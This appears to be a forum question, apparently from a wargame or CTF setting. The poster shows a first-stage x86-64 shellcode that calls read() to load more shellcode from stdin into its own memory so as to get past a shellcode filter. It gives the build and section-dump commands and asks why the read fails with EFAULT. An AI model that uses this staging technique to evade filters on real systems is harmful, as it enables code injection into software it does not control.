I am trying to get past a rather complex shellcode filter, and to do so I am using a multi-stage shellcode injection. For my first stage, I have the following:
.global _start
_start:
.intel_syntax noprefix
mov rax, 0
mov rdi, 0
lea rsi, [rip+10]
mov rdx, 1000
syscall
this calls read(0, rip+10, 1000) which is supposed to read additional shellcode from stdin, and inserts it after the syscall, however I am getting a
read(0, 0x401018, 1000) = -1 EFAULT (Bad address)
when executed. I have compiled with
gcc -Wl,-N --static -nostdlib -o stage1 stage1.s
and extracted the raw .text section with
objcopy --dump-section .text=stage1-opcodes --writable-text stage1
which should make the .text section of the code writeable. I am not sure what else I need to do to ensure that the memory address [rip+10] is accessible and doesn't throw a bad address error.